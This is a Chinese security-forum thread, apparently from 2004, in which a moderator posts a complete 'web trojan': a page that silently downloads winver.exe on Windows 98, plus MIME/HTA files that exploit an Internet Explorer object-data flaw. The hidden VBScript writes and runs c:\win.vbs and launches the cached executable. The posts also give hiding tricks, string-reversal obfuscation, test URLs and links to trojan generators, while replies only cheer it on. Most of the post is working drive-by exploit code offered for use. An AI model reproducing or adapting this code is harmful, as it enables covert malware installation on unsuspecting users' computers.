|
 | 作者: yimarong [yimarong]
 版主 |
登录 |
| 最新网页木马--暴好用!!!!! 和其它几个利用HTA洞洞的木马的比较: 陈经韬的bmp2exe:这个玩意儿可以在98下使用,但是 执行速度有点慢,弹出来的HTA框太明显了! 下载 http://www.chinesehack.org/down/show.asp?id=4092 动鲨的--动鲨网页木马生成器里面的两个都是只能在win2k 下执行,因为98默认没有adodb.stream控件.!!!! 下载:http://www.chinesehack.org/down/show.asp?id=3989 安焦的--icefox的只是个例子不实用哟! http://www.xfocus.net/articles/200309/607.html http://www.chinansl.com/czy/a.htm 测试页面,只在win98+ie5测试成功. 自动把网上的一个winver.exe的文件下下来执行. 代码如下:大家看看还有什么地方要更改的,个人认为 是现在最好的利用hta洞洞的木马了. 一共用了 wscript.shell Scripting.FileSystemObject Microsoft.XMLHTTP shell.application 四个对象.. 现在一个是想尽量少用对象.wscript.shell是可以省了. 其它的好象不能省去了,本来想用script.typelib代替fso 的但不行哟.最下面的是新代码只用了shell.application对象 另外就是想任务栏的小框完全的隐藏.... (这个问题现在解决啦。。。) 对HTA设置showintaskbar="no" 在脚本中window.moveTo -100,-100 ---------------a.htm------------------------ <IE:Download ID="downloader" STYLE="behavior:url(#default#download)" /> <script> function save(txt){var a='123';} </script> <script language=vbs> a=navigator.appVersion b=split(a,";") for i=0 to ubound(b) if trim(b(i))="Windows 98" then '如果是win98则下载安装后门 downloader.startDownload "winver.exe",save document.write "<IFRAME SRC=b.eml><"&"/IFRAME>" exit for end if next </script> -----------------------end------------------- ----b.eml-----------------------cut here----------------------------- MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="1" --1 Content-Type: multipart/alternative; boundary="2" --2 Content-Type: text/html; charset="gb2312" Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> <TITLE> IE Object Data 数据远程执行漏洞测试 </TITLE> </HEAD> <BODY bgColor=3D#ffffff> <CENTER><span datasrc=3D"#oExec" datafld=3D"exploit" dataformatas=3D"html"></span> <xml id=3D"oExec"> <security> <exploit> <![CDATA[ <object id=3D"oFile" data=3Dcid:THE-CID></object> ]]> </exploit> </security> </xml> </CENTER> </BODY> </HTML> --2-- --1 Content-Type: application/hta; Content-Transfer-Encoding: 7bit Content-ID: <THE-CID> <html> <HTA:APPLICATION caption="no" border="none" windowState="minimize" visiable="no" showintaskbar="no"> <body> <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object> <script language="VBScript"> window.moveTo -100,-100 wsh.RegWrite "HKCR\.VBS\","vbsfile" httpdoget "b.txt" Function HttpDoGet(url) set oReq = CreateObject("Microsoft.XMLHTTP") oReq.open "GET",url,false oReq.send If oReq.status=200 then HttpDoGet=oReq.responseTEXT SaveFile HttpDoGet,"c:\win.vbs" Set oReq=nothing End if End Function sub SaveFile(str,fName) Dim fso, tf Set fso = CreateObject("Scripting.FileSystemObject") Set tf = fso.CreateTextFile(fName, True) tf.Write str tf.Close wsh.run "c:\win.vbs" window.close End sub </script> </body> </html> --1-- ------------------------------end-----------b.eml----------------- ------b.txt---------------------cut here--------------------- Option Explicit Dim shell,nettemp,fod,foditems,co,zitemp,co1,tpath,wsh Set wsh = CreateObject("wscript.shell") tpath=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache") On Error Resume Next Set Shell = CreateObject("Shell.Application") nettemp=tpath&"\Content.IE5\" call temp() function temp() On Error Resume Next set fod=Shell.Namespace(nettemp) set foditems=fod.items for each co in foditems if co.size=0 then 'msgbox co.name zi co.name end if next end function sub zi(zitemp) On Error Resume Next set fod=Shell.Namespace(nettemp&zitemp) set foditems=fod.items for each co1 in foditems if left(co1.name,6)="winver" and right(co1.name,3)="exe" then 'msgbox co1.name co1.InvokeVerb exit sub end if next end sub -------------------------end------------b.txt----------------- 又把代码改了一下,可以只用一个shell控件了哈哈. 测试http://www.chinansl.com/czy/c.htm ---------------------------begin---------------c.eml------------------- MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="1" --1 Content-Type: multipart/alternative; boundary="2" --2 Content-Type: text/html; charset="gb2312" Content-Transfer-Encoding: quoted-printable <HTML> <HEAD> </HEAD> <BODY bgColor=3D#ffffff> <CENTER> <object style=3D"display:none" data=3Dcid:THE-CID height=3D0 width=3D0></object> </CENTER> </BODY> </HTML> --2-- --1 Content-Type: application/hta; Content-Transfer-Encoding: 7bit Content-ID: <THE-CID> <html> <HTA:APPLICATION caption="no" border="none" windowState="minimize" visiable="no" showintaskbar="no"> <body> <script language="VBScript"> window.moveTo -100,-100 On Error Resume Next Set Shell = CreateObject(StrReverse("NoitAcilppa.LLehs")) nettemp="C:\WINDOWS\Temporary Internet Files\Content.IE5\" call temp() function temp() On Error Resume Next set fod=Shell.Namespace(nettemp) set foditems=fod.items for each co in foditems if co.size=0 then zi co.name end if next end function sub zi(zitemp) On Error Resume Next set fod=Shell.Namespace(nettemp&zitemp) set foditems=fod.items for each co1 in foditems if left(co1.name,6)="winver" and right(co1.name,3)="exe" then co1.InvokeVerb window.close end if next end sub window.close </script> </body> </html> --1-- -----------------------------end-------------c.eml------------------ 相当于作一个漏洞收集 过10年看仅作怀旧罢了~ |
| 地主 发表时间: 04-02-05 18:18 |
 | 回复: NetPolaris [newmyth21] 论坛用户 |
登录 |
好贴,顶了。 |
| B1层 发表时间: 04-02-05 18:51 |
| 回复: yimarong [yimarong] 版主 |
登录 |
|
呵呵~有了袁哥中联的实用人才就是多啊! |
| B2层 发表时间: 04-02-05 19:48 |
 | 回复: hudou [hudou]  论坛用户 |
登录 |
|
我们太需要这样的技术文章了 |
| B3层 发表时间: 04-02-05 19:50 |
 | 回复: bailove [bailove]  论坛用户 |
登录 |
顶 |
| B4层 发表时间: 04-02-05 20:53 |
| 回复: yimarong [yimarong] 版主 |
登录 |
|
呵呵~继续顶~ |
| B5层 发表时间: 04-02-07 14:39 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 最新网页木马分析~转中联